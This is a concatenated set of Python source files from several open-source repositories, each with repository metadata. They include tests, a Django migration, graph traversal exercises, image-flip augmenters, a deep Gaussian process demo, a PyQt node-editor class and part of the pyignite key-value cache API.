6a05188139a9d21e9e36ba6e3d3eb0801c8187c7 | 416 | py | Python | cloudkeeperV1/plugins/cleanup_aws_loadbalancers/test/test_args.py | mesosphere/cloudkeeper | 11be262df5874c1033cfec9964bba1596cab6a36 | [
"Apache-2.0"
] | 99 | 2020-04-15T22:56:34.000Z | 2021-06-13T15:04:55.000Z | cloudkeeperV1/plugins/cleanup_aws_loadbalancers/test/test_args.py | mesosphere/cloudkeeper | 11be262df5874c1033cfec9964bba1596cab6a36 | [
"Apache-2.0"
] | null | null | null | cloudkeeperV1/plugins/cleanup_aws_loadbalancers/test/test_args.py | mesosphere/cloudkeeper | 11be262df5874c1033cfec9964bba1596cab6a36 | [
"Apache-2.0"
] | 14 | 2020-04-14T22:13:59.000Z | 2021-04-05T16:42:31.000Z | from cklib.args import get_arg_parser, ArgumentParser
from cloudkeeper_plugin_cleanup_aws_loadbalancers import CleanupAWSLoadbalancersPlugin
def test_args():
arg_parser = get_arg_parser()
CleanupAWSLoadbalancersPlugin.add_args(arg_parser)
arg_parser.parse_args()
assert ArgumentParser.args.cleanup_aws_loadbalancers is False
assert ArgumentParser.args.cleanup_aws_loadbalancers_age == "7 days"
| 37.818182 | 86 | 0.834135 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 | 0.019231 |
6a0593a2d9f168fbcc460c2d82964c99ec312e4a | 911 | py | Python | mayan/apps/metadata/migrations/0011_auto_20180917_0645.py | prezi/mayan-edms | e9bc10a056c3379b57115c6e83022f48c6298e1d | [
"Apache-2.0"
] | 4 | 2019-02-17T08:35:42.000Z | 2019-03-28T06:02:11.000Z | mayan/apps/metadata/migrations/0011_auto_20180917_0645.py | zhoubear/mayan-edms | e9bc10a056c3379b57115c6e83022f48c6298e1d | [
"Apache-2.0"
] | 1 | 2018-10-11T13:01:34.000Z | 2018-10-11T13:01:34.000Z | mayan/apps/metadata/migrations/0011_auto_20180917_0645.py | prezi/mayan-edms | e9bc10a056c3379b57115c6e83022f48c6298e1d | [
"Apache-2.0"
] | 3 | 2019-01-29T13:21:57.000Z | 2019-10-27T03:20:15.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-09-17 06:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('metadata', '0010_auto_20180823_2353'),
]
operations = [
migrations.AlterField(
model_name='documentmetadata',
name='value',
field=models.CharField(blank=True, db_index=True, help_text='The actual value stored in the metadata type field for the document.', max_length=255, null=True, verbose_name='Value'),
),
migrations.AlterField(
model_name='metadatatype',
name='name',
field=models.CharField(help_text='Name used by other apps to reference this metadata type. Do not use python reserved words, or spaces.', max_length=48, unique=True, verbose_name='Name'),
),
]
| 35.038462 | 199 | 0.657519 | 752 | 0.825467 | 0 | 0 | 0 | 0 | 0 | 0 | 338 | 0.371021 |
6a0724ca0ed93e378a29473e0b6b5911cc4be4e6 | 944 | py | Python | algorithm/dfs/boj_1260.py | ruslanlvivsky/python-algorithm | 2b49bed33cd0e95b8a1e758008191f4392b3f667 | [
"MIT"
] | 3 | 2021-07-18T14:40:24.000Z | 2021-08-14T18:08:13.000Z | algorithm/dfs/boj_1260.py | jinsuSang/python-algorithm | 524849a0a7e71034d329fef63c4f384930334177 | [
"MIT"
] | null | null | null | algorithm/dfs/boj_1260.py | jinsuSang/python-algorithm | 524849a0a7e71034d329fef63c4f384930334177 | [
"MIT"
] | null | null | null | def dfs(V):
print(V, end=' ')
visited[V] = True
for n in graph[V]:
if not visited[n]:
dfs(n)
def dfs_s(V):
stack = [V]
visited[V] = True
while stack:
now = stack.pop()
print(now, end=' ')
for n in graph[now]:
if not visited[n]:
stack.append(n)
visited[n] = True
def bfs(V):
visited[V] = True
queue = [V]
while queue:
now = queue.pop(0)
print(now, end=' ')
for n in graph[now]:
if not visited[n]:
queue.append(n)
visited[n] = True
N, M, V = map(int, input().strip().split())
visited = [False] * (N + 1)
graph = [[] for _ in range(N + 1)]
for i in range(M):
a, b = map(int, input().strip().split())
graph[a].append(b)
graph[b].append(a)
for i in range(1, N + 1):
graph[i].sort()
dfs(V)
visited = [False] * (N + 1)
print()
bfs(V)
| 19.265306 | 44 | 0.470339 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 | 0.009534 |
6a07aa532405a92d53e9ed5f46dcbcbd7a845cfa | 634 | py | Python | redirector.py | UKPLab/DiGAT | b044648a6c79428872a778908d3a8a689f0ac3e6 | [
"Apache-2.0"
] | 8 | 2016-06-22T17:02:45.000Z | 2020-11-16T23:46:13.000Z | redirector.py | UKPLab/DiGAT | b044648a6c79428872a778908d3a8a689f0ac3e6 | [
"Apache-2.0"
] | null | null | null | redirector.py | UKPLab/DiGAT | b044648a6c79428872a778908d3a8a689f0ac3e6 | [
"Apache-2.0"
] | 1 | 2019-02-25T04:40:04.000Z | 2019-02-25T04:40:04.000Z | from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
__author__ = "Artem Vovk, Roland Kluge, and Christian Kirschner"
__copyright__ = "Copyright 2013-2015 UKP TU Darmstadt"
__credits__ = ["Artem Vovk", "Roland Kluge", "Christian Kirschner"]
__license__ = "ASL"
class Redirector(webapp.RequestHandler):
def get(self):
self.redirect("/argunit/home")
def post(self):
self.redirect("/argunit/home")
application = webapp.WSGIApplication(
[('/.*', Redirector)],
debug=True)
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
| 22.642857 | 67 | 0.705047 | 158 | 0.249211 | 0 | 0 | 0 | 0 | 0 | 0 | 186 | 0.293375 |
6a07ddc6734dd5ce8f0853fa4326c144429dfb84 | 5,214 | py | Python | imgaug/augmenters/flip.py | pAoenix/image-Augmented | 4acaa7dc48c6167c1716e39e9e78b1cea2067b4a | [
"MIT"
] | 1 | 2020-12-30T02:48:40.000Z | 2020-12-30T02:48:40.000Z | imgaug/augmenters/flip.py | pAoenix/image-Augmented | 4acaa7dc48c6167c1716e39e9e78b1cea2067b4a | [
"MIT"
] | null | null | null | imgaug/augmenters/flip.py | pAoenix/image-Augmented | 4acaa7dc48c6167c1716e39e9e78b1cea2067b4a | [
"MIT"
] | 2 | 2020-01-14T14:29:49.000Z | 2021-02-20T07:47:02.000Z | """
Augmenters that apply mirroring/flipping operations to images.
Do not import directly from this file, as the categorization is not final.
Use instead ::
from imgaug import augmenters as iaa
and then e.g. ::
seq = iaa.Sequential([
iaa.Fliplr((0.0, 1.0)),
iaa.Flipud((0.0, 1.0))
])
List of augmenters:
* Fliplr
* Flipud
"""
from __future__ import print_function, division, absolute_import
from .. import parameters as iap
import numpy as np
import six.moves as sm
from .meta import Augmenter
class Fliplr(Augmenter): # pylint: disable=locally-disabled, unused-variable, line-too-long
"""
Flip/mirror input images horizontally.
Parameters
----------
p : number or StochasticParameter, optional(default=0)
Probability of each image to get flipped.
name : string, optional(default=None)
See `Augmenter.__init__()`
deterministic : bool, optional(default=False)
See `Augmenter.__init__()`
random_state : int or np.random.RandomState or None, optional(default=None)
See `Augmenter.__init__()`
Examples
--------
>>> aug = iaa.Fliplr(0.5)
would horizontally flip/mirror 50 percent of all input images.
>>> aug = iaa.Fliplr(1.0)
would horizontally flip/mirror all input images.
"""
def __init__(self, p=0, name=None, deterministic=False, random_state=None):
super(Fliplr, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
self.p = iap.handle_probability_param(p, "p")
def _augment_images(self, images, random_state, parents, hooks):
nb_images = len(images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
for i in sm.xrange(nb_images):
if samples[i] == 1:
images[i] = np.fliplr(images[i])
return images
def _augment_heatmaps(self, heatmaps, random_state, parents, hooks):
arrs_flipped = self._augment_images(
[heatmaps_i.arr_0to1 for heatmaps_i in heatmaps],
random_state=random_state,
parents=parents,
hooks=hooks
)
for heatmaps_i, arr_flipped in zip(heatmaps, arrs_flipped):
heatmaps_i.arr_0to1 = arr_flipped
return heatmaps
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
nb_images = len(keypoints_on_images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
for i, keypoints_on_image in enumerate(keypoints_on_images):
if samples[i] == 1:
width = keypoints_on_image.shape[1]
for keypoint in keypoints_on_image.keypoints:
keypoint.x = (width - 1) - keypoint.x
return keypoints_on_images
def get_parameters(self):
return [self.p]
class Flipud(Augmenter): # pylint: disable=locally-disabled, unused-variable, line-too-long
"""
Flip/mirror input images vertically.
Parameters
----------
p : number or StochasticParameter, optional(default=0)
Probability of each image to get flipped.
name : string, optional(default=None)
See `Augmenter.__init__()`
deterministic : bool, optional(default=False)
See `Augmenter.__init__()`
random_state : int or np.random.RandomState or None, optional(default=None)
See `Augmenter.__init__()`
Examples
--------
>>> aug = iaa.Flipud(0.5)
would vertically flip/mirror 50 percent of all input images.
>>> aug = iaa.Flipud(1.0)
would vertically flip/mirror all input images.
"""
def __init__(self, p=0, name=None, deterministic=False, random_state=None):
super(Flipud, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
self.p = iap.handle_probability_param(p, "p")
def _augment_images(self, images, random_state, parents, hooks):
nb_images = len(images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
for i in sm.xrange(nb_images):
if samples[i] == 1:
images[i] = np.flipud(images[i])
return images
def _augment_heatmaps(self, heatmaps, random_state, parents, hooks):
arrs_flipped = self._augment_images(
[heatmaps_i.arr_0to1 for heatmaps_i in heatmaps],
random_state=random_state,
parents=parents,
hooks=hooks
)
for heatmaps_i, arr_flipped in zip(heatmaps, arrs_flipped):
heatmaps_i.arr_0to1 = arr_flipped
return heatmaps
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
nb_images = len(keypoints_on_images)
samples = self.p.draw_samples((nb_images,), random_state=random_state)
for i, keypoints_on_image in enumerate(keypoints_on_images):
if samples[i] == 1:
height = keypoints_on_image.shape[0]
for keypoint in keypoints_on_image.keypoints:
keypoint.y = (height - 1) - keypoint.y
return keypoints_on_images
def get_parameters(self):
return [self.p]
| 32.185185 | 103 | 0.652091 | 4,671 | 0.895857 | 0 | 0 | 0 | 0 | 0 | 0 | 1,871 | 0.358842 |
6a0b84b7b59fd4b039d379ec665100c80b070e0d | 1,347 | py | Python | 2. Add Two Numbers DC(12-1-21).py | Dharaneeshwar/Leetcode | cc3ed07f6ac5f4d6e3f60c57a94a06a8be2f5287 | [
"MIT"
] | 4 | 2020-11-17T05:24:24.000Z | 2021-06-14T21:01:45.000Z | 2. Add Two Numbers DC(12-1-21).py | Dharaneeshwar/Leetcode | cc3ed07f6ac5f4d6e3f60c57a94a06a8be2f5287 | [
"MIT"
] | null | null | null | 2. Add Two Numbers DC(12-1-21).py | Dharaneeshwar/Leetcode | cc3ed07f6ac5f4d6e3f60c57a94a06a8be2f5287 | [
"MIT"
] | null | null | null | # Time Complexity - O(n) ; Space Complexity - O(n)
class Solution:
def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:
carry = 0
out = temp = ListNode()
while l1 is not None and l2 is not None:
tempsum = l1.val + l2.val
tempsum += carry
if tempsum > 9:
carry = tempsum//10
tempsum %= 10
else:
carry = 0
temp.next = ListNode(tempsum)
temp = temp.next
l1 = l1.next
l2 = l2.next
if l1:
while l1:
tempsum = l1.val + carry
if tempsum > 9:
carry = tempsum//10
tempsum %= 10
else:
carry = 0
temp.next = ListNode(tempsum)
temp = temp.next
l1 = l1.next
elif l2:
while l2:
tempsum = l2.val + carry
if tempsum > 9:
carry = tempsum//10
tempsum %= 10
else:
carry = 0
temp.next = ListNode(tempsum)
temp = temp.next
l2 = l2.next
if carry:
temp.next = ListNode(carry)
return out.next | 31.325581 | 76 | 0.400148 | 1,295 | 0.961396 | 0 | 0 | 0 | 0 | 0 | 0 | 50 | 0.03712 |
6a0b98cc37e3d3bfecf8eba880eba829290a251c | 1,862 | py | Python | deepgp_dsvi/demos/step_function.py | dks28/Deep-Gaussian-Process | a7aace43e78aae81468849aee7d172742e6ecf86 | [
"MIT"
] | 21 | 2020-03-07T15:40:13.000Z | 2021-11-05T07:49:24.000Z | deepgp_dsvi/demos/step_function.py | dks28/Deep-Gaussian-Process | a7aace43e78aae81468849aee7d172742e6ecf86 | [
"MIT"
] | 3 | 2021-02-03T13:32:45.000Z | 2021-07-17T16:07:06.000Z | src/demos/step_function.py | FelixOpolka/Deep-Gaussian-Process | 40181f210d7b09863c321d1a90335be77233df80 | [
"MIT"
] | 2 | 2020-08-10T14:02:28.000Z | 2020-12-28T16:03:09.000Z | import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from gpflow.kernels import White, RBF
from gpflow.likelihoods import Gaussian
from deep_gp import DeepGP
np.random.seed(0)
tf.random.set_seed(0)
def get_data():
Ns = 300
Xs = np.linspace(-0.5, 1.5, Ns)[:, None]
N, M = 50, 25
X = np.random.uniform(0, 1, N)[:, None]
Z = np.random.uniform(0, 1, M)[:, None]
f_step = lambda x: 0. if x < 0.5 else 1.
Y = np.reshape([f_step(x) for x in X], X.shape) + np.random.randn(
*X.shape) * 1e-2
return Xs, X, Y, Z
def make_deep_GP(num_layers, X, Y, Z):
kernels = []
layer_sizes = []
for l in range(num_layers):
kernel = RBF(lengthscales=0.2, variance=1.0) + White(variance=1e-5)
kernels.append(kernel)
layer_sizes.append(1)
dgp = DeepGP(X, Y, Z, kernels, layer_sizes, Gaussian(), num_samples=100)
# init hidden layers to be near deterministic
for layer in dgp.layers[:-1]:
layer.q_sqrt.assign(layer.q_sqrt * 1e-5)
return dgp
if __name__ == '__main__':
Xs, X_train, Y_train, Z = get_data()
dgp = make_deep_GP(3, X_train, Y_train, Z)
optimizer = tf.optimizers.Adam(learning_rate=0.01, epsilon=1e-08)
for _ in range(1500):
with tf.GradientTape(watch_accessed_variables=False) as tape:
tape.watch(dgp.trainable_variables)
objective = -dgp.elbo((X_train, Y_train))
gradients = tape.gradient(objective, dgp.trainable_variables)
optimizer.apply_gradients(zip(gradients, dgp.trainable_variables))
print(f"ELBO: {-objective.numpy()}")
samples, _, _ = dgp.predict_all_layers(Xs, num_samples=50, full_cov=True)
plt.plot(Xs, samples[-1].numpy()[:, :, 0].T, color='r', alpha=0.3)
plt.title('Deep Gaussian Process')
plt.scatter(X_train, Y_train)
plt.show() | 31.033333 | 77 | 0.645005 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 110 | 0.059076 |
6a0bd26d528523a33d941c1d0799a814a2b95dcf | 5,343 | py | Python | metaspace/engine/sm/engine/annotation_lithops/moldb_pipeline.py | METASPACE2020/METASPACE | e1acd9a409f84a78eed7ca9713258c09b0e137ca | [
"Apache-2.0"
] | 32 | 2018-08-13T15:49:42.000Z | 2022-01-17T18:32:19.000Z | metaspace/engine/sm/engine/annotation_lithops/moldb_pipeline.py | METASPACE2020/METASPACE | e1acd9a409f84a78eed7ca9713258c09b0e137ca | [
"Apache-2.0"
] | 624 | 2018-07-02T15:18:22.000Z | 2022-03-30T08:10:35.000Z | metaspace/engine/sm/engine/annotation_lithops/moldb_pipeline.py | METASPACE2020/METASPACE | e1acd9a409f84a78eed7ca9713258c09b0e137ca | [
"Apache-2.0"
] | 6 | 2021-01-10T22:24:30.000Z | 2022-03-16T19:14:37.000Z | from __future__ import annotations
import json
import logging
from contextlib import contextmanager, ExitStack
from typing import List, Dict
import pandas as pd
from lithops.storage import Storage
from lithops.storage.utils import CloudObject, StorageNoSuchKeyError
from sm.engine.annotation_lithops.build_moldb import (
build_moldb,
InputMolDb,
DbFDRData,
)
from sm.engine.annotation_lithops.calculate_centroids import (
calculate_centroids,
validate_centroids,
)
from sm.engine.annotation_lithops.executor import Executor
from sm.engine.annotation_lithops.io import (
CObj,
save_cobj,
iter_cobjects_with_prefetch,
deserialize,
)
from sm.engine.annotation_lithops.utils import jsonhash
from sm.engine.utils.db_mutex import DBMutex
from sm.engine.ds_config import DSConfig
from sm.engine.annotation.isocalc_wrapper import IsocalcWrapper
logger = logging.getLogger('annotation-pipeline')
class CentroidsCacheEntry:
def __init__(
self, executor: Executor, sm_storage: Dict, ds_config: DSConfig, moldbs: List[InputMolDb]
):
ds_hash_params = ds_config.copy()
self.ds_config = {
**ds_hash_params, # type: ignore # https://github.com/python/mypy/issues/4122
# Include the `targeted` value of databases so that a new cache entry is made if
# someone manually changes that field
'databases': [(moldb['id'], moldb['targeted']) for moldb in moldbs],
}
# Remove database_ids as it may be in a different order to moldbs
del self.ds_config['database_ids']
self.ds_hash = jsonhash(self.ds_config)
self.executor = executor
self.storage = executor.storage
self.bucket, raw_prefix = sm_storage['centroids']
self.prefix = f"{raw_prefix}/{self.ds_hash}"
self.config_key = f'{self.prefix}/ds_config.json'
self.meta_key = f'{self.prefix}/meta'
@contextmanager
def lock(self):
with DBMutex().lock(self.ds_hash, timeout=3600):
yield
def load(self):
try:
db_data_cobjs, peaks_cobjs = deserialize(
self.storage.get_object(self.bucket, self.meta_key)
)
return db_data_cobjs, peaks_cobjs
except StorageNoSuchKeyError:
return None
def save(self, db_data_cobjs: List[CObj[DbFDRData]], peaks_cobjs: List[CObj[pd.DataFrame]]):
def batch_copy(src_cobjs: List[CloudObject], dest_prefix: str, *, storage: Storage):
# If Lithops' storage supported Copy Object operations, this could be easily optimized.
# Not sure if it's worth the effort yet
result_cobjs = []
for i, data in enumerate(iter_cobjects_with_prefetch(storage, src_cobjs)):
dest_key = f'{dest_prefix}/{i:06}'
result_cobjs.append(storage.put_cloudobject(data, dest_bucket, dest_key))
return result_cobjs
dest_bucket = self.bucket
# Copy cobjs to the cache dir
new_db_data_cobjs, new_peaks_cobjs = self.executor.map(
batch_copy,
[(db_data_cobjs, f'{self.prefix}/db_data'), (peaks_cobjs, f'{self.prefix}/peaks')],
runtime_memory=1024,
)
# Save config in case it's needed for debugging
self.storage.put_cloudobject(
json.dumps(self.ds_config, indent=4), self.bucket, self.config_key
)
# Save list of cobjects. This list would be easy to reconstruct by listing keys, but
# saving a separate object as the last step of the process is helpful to confirm that
# the cache item is complete, and didn't partially fail to copy.
save_cobj(self.storage, (new_db_data_cobjs, new_peaks_cobjs), self.bucket, self.meta_key)
return new_db_data_cobjs, new_peaks_cobjs
def clear(self):
keys = self.storage.list_keys(self.bucket, self.prefix)
if keys:
logger.info(f'Clearing centroids cache {self.prefix}')
self.storage.delete_objects(self.bucket, keys)
def get_moldb_centroids(
executor: Executor,
sm_storage: Dict,
ds_config: DSConfig,
moldbs: List[InputMolDb],
debug_validate=False,
use_cache=True,
use_db_mutex=True,
):
moldb_cache = CentroidsCacheEntry(executor, sm_storage, ds_config, moldbs)
with ExitStack() as stack:
if use_db_mutex:
stack.enter_context(moldb_cache.lock())
if use_cache:
cached_val = moldb_cache.load()
else:
cached_val = None
moldb_cache.clear()
if cached_val:
db_data_cobjs, peaks_cobjs = cached_val
logger.info(
f'Loaded {len(db_data_cobjs)} DBs, {len(peaks_cobjs)} peak segms from cache'
)
else:
formula_cobjs, db_data_cobjs = build_moldb(executor, ds_config, moldbs)
isocalc_wrapper = IsocalcWrapper(ds_config)
peaks_cobjs = calculate_centroids(executor, formula_cobjs, isocalc_wrapper)
if debug_validate:
validate_centroids(executor, peaks_cobjs)
moldb_cache.save(db_data_cobjs, peaks_cobjs)
logger.info(f'Saved {len(db_data_cobjs)} DBs, {len(peaks_cobjs)} peak segms to cache')
return db_data_cobjs, peaks_cobjs
| 36.59589 | 99 | 0.668351 | 3,147 | 0.588995 | 90 | 0.016844 | 110 | 0.020588 | 0 | 0 | 1,088 | 0.203631 |
6a0dc9555ac01260e856ab868bd3c294497c065f | 2,830 | py | Python | gui/main_window/node_editor/items/connector_top_item.py | anglebinbin/Barista-tool | 2d51507fb3566881923f0b273127f59d23ed317f | [
"MIT"
] | 1 | 2020-02-11T19:05:17.000Z | 2020-02-11T19:05:17.000Z | gui/main_window/node_editor/items/connector_top_item.py | anglebinbin/Barista-tool | 2d51507fb3566881923f0b273127f59d23ed317f | [
"MIT"
] | null | null | null | gui/main_window/node_editor/items/connector_top_item.py | anglebinbin/Barista-tool | 2d51507fb3566881923f0b273127f59d23ed317f | [
"MIT"
] | null | null | null | from PyQt5.QtWidgets import QMenu
from gui.main_window.node_editor.items.connector_item import ConnectorItem
class ConnectorTopItem(ConnectorItem):
""" Class to provide top connector functionality """
def __init__(self, index, nodeItem, nodeEditor, parent=None):
super(ConnectorTopItem, self).__init__(index, nodeItem, nodeEditor, parent)
def isTopConnector(self):
""" Returns whether the connector is a top connector (implementation for parent class) """
return True
def isInPlace(self):
""" Returns whether the connector is connected to a in-place working layer
A top connector is in place if any connected bottom connector is in place.
(implementation for parent class) """
for connection in self._connections:
if connection.getIsInPlace():
return True
return False
def getConnectedNodes(self):
""" Returns a list of node items, connected to this connector (implementation for parent class) """
nodes = list()
# for each connection get the node connected to the bottom of the connection
for connection in self._connections:
connectionsBottomConnector = connection.getBottomConnector()
if connectionsBottomConnector is not None:
nodes.append(connectionsBottomConnector.getNodeItem())
return nodes
def addConnection(self, connection):
""" Adds a connection to the connector and sets the start of the connection to this connectors position
(implementation for parent class) """
self._connections.append(connection)
connection.setStart(self.scenePos())
def updateConnectionPositions(self):
""" Updates the connected connections, sets the start of all connected connections to this connectors position
(implementation for parent class) """
for connection in self._connections:
connection.setStart(self.scenePos())
def contextMenuEvent(self, event):
""" Context menu for the top connector """
contextMenu = QMenu()
renameTop = contextMenu.addAction("Change name")
disconnectTop = contextMenu.addAction("Disconnect")
if self.getConnectionCount() == 0:
disconnectTop.setEnabled(False)
removeTop = contextMenu.addAction("Remove")
action = contextMenu.exec_(event.screenPos())
if action is not None:
if action == removeTop:
self._nodeEditor.tryToRemoveTopBlob(self._nodeItem.getLayerID(), self._index)
elif action == renameTop:
self._nodeEditor.tryToRenameTopBlob(self)
elif action == disconnectTop:
self._nodeEditor.disconnectTopBlob(self._nodeItem.getLayerID(), self._index)
| 44.21875 | 118 | 0.673852 | 2,717 | 0.960071 | 0 | 0 | 0 | 0 | 0 | 0 | 917 | 0.324028 |
6a0e0bcfcfbc438530da36eb95d62a35b14a3931 | 33,998 | py | Python | modules/platforms/python/pyignite/api/key_value.py | DirectXceriD/gridgain | 093e512a9147e266f83f6fe1cf088c0b037b501c | [
"Apache-2.0",
"CC0-1.0"
] | 1 | 2019-03-11T08:52:37.000Z | 2019-03-11T08:52:37.000Z | modules/platforms/python/pyignite/api/key_value.py | DirectXceriD/gridgain | 093e512a9147e266f83f6fe1cf088c0b037b501c | [
"Apache-2.0",
"CC0-1.0"
] | null | null | null | modules/platforms/python/pyignite/api/key_value.py | DirectXceriD/gridgain | 093e512a9147e266f83f6fe1cf088c0b037b501c | [
"Apache-2.0",
"CC0-1.0"
] | null | null | null | # GridGain Community Edition Licensing
# Copyright 2019 GridGain Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License") modified with Commons Clause
# Restriction; you may not use this file except in compliance with the License. You may obtain a
# copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the
# License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
#
# Commons Clause Restriction
#
# The Software is provided to you by the Licensor under the License, as defined below, subject to
# the following condition.
#
# Without limiting other conditions in the License, the grant of rights under the License will not
# include, and the License does not grant to you, the right to Sell the Software.
# For purposes of the foregoing, “Sell” means practicing any or all of the rights granted to you
# under the License to provide to third parties, for a fee or other consideration (including without
# limitation fees for hosting or consulting/ support services related to the Software), a product or
# service whose value derives, entirely or substantially, from the functionality of the Software.
# Any license notice or attribution required by the License must also include this Commons Clause
# License Condition notice.
#
# For purposes of the clause above, the “Licensor” is Copyright 2019 GridGain Systems, Inc.,
# the “License” is the Apache License, Version 2.0, and the Software is the GridGain Community
# Edition software provided with this notice.
from typing import Iterable, Union
from pyignite.queries.op_codes import *
from pyignite.datatypes import (
Map, Bool, Byte, Int, Long, AnyDataArray, AnyDataObject,
)
from pyignite.datatypes.key_value import PeekModes
from pyignite.queries import Query, Response
from pyignite.utils import cache_id
def cache_put(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache (overwriting existing value if any).
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status if a value
is written, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_PUT,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
return query_struct.perform(connection, {
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
})
def cache_get(
connection: 'Connection', cache: Union[str, int], key,
key_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Retrieves a value from cache by key.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a value
retrieved on success, non-zero status and an error description on failure.
"""
query_struct = Query(
OP_CACHE_GET,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status != 0:
return result
result.value = result.value['value']
return result
def cache_get_all(
connection: 'Connection', cache: Union[str, int], keys: Iterable,
binary=False, query_id=None,
) -> 'APIResult':
"""
Retrieves multiple key-value pairs from cache.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param keys: list of keys or tuples of (key, key_hint),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a dict, made of
retrieved key-value pairs, non-zero status and an error description
on failure.
"""
query_struct = Query(
OP_CACHE_GET_ALL,
[
('hash_code', Int),
('flag', Byte),
('keys', AnyDataArray()),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'keys': keys,
},
response_config=[
('data', Map),
],
)
if result.status == 0:
result.value = dict(result.value)['data']
return result
def cache_put_all(
connection: 'Connection', cache: Union[str, int], pairs: dict,
binary=False, query_id=None,
) -> 'APIResult':
"""
Puts multiple key-value pairs to cache (overwriting existing associations
if any).
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param pairs: dictionary type parameters, contains key-value pairs to save.
Each key or value can be an item of representable Python type or a tuple
of (item, hint),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status if key-value pairs
are written, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_PUT_ALL,
[
('hash_code', Int),
('flag', Byte),
('data', Map),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'data': pairs,
},
)
def cache_contains_key(
connection: 'Connection', cache: Union[str, int], key,
key_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Returns a value indicating whether given key is present in cache.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a bool value
retrieved on success: `True` when key is present, `False` otherwise,
non-zero status and an error description on failure.
"""
query_struct = Query(
OP_CACHE_CONTAINS_KEY,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
response_config=[
('value', Bool),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_contains_keys(
connection: 'Connection', cache: Union[str, int], keys: Iterable,
binary=False, query_id=None,
) -> 'APIResult':
"""
Returns a value indicating whether all given keys are present in cache.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param keys: a list of keys or (key, type hint) tuples,
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a bool value
retrieved on success: `True` when all keys are present, `False` otherwise,
non-zero status and an error description on failure.
"""
query_struct = Query(
OP_CACHE_CONTAINS_KEYS,
[
('hash_code', Int),
('flag', Byte),
('keys', AnyDataArray()),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'keys': keys,
},
response_config=[
('value', Bool),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_get_and_put(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache, and returns the previous value
for that key, or null value if there was not such key.
:param connection: connection to Ignite server,
